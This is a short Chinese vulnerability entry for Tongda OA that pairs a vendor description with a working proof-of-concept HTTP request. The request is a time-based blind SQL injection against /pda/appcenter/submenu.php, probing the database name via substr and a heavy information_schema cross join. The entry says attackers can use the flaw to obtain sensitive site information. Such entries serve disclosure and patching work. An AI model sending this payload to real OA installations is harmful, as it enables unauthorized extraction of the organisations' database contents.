漏洞描述
通达OA系统代表了协同OA的先进理念,16年研发铸就成熟OA产品,协同OA软件行业唯一央企团队研发,多次摘取国内OA软件金奖,拥有2万多家正式用户,8万多家免费版用户,超过500万终端用户。通达OA系统s***u.php存在SQL注入漏洞,攻击者可利用漏洞获取网站敏感信息。
GET /pda/appcenter/submenu.php?appid=1%20and%20(substr(DATABASE(),1,1))=char(116)%20and%20(select%20count(*)%20from%20information_schema.columns%20A,information_schema.columns%20B)
userid_flash=214eUQYFUgECBFQJVFcHCwADVlIOVAIDAgBUAlQJ HTTP/1.1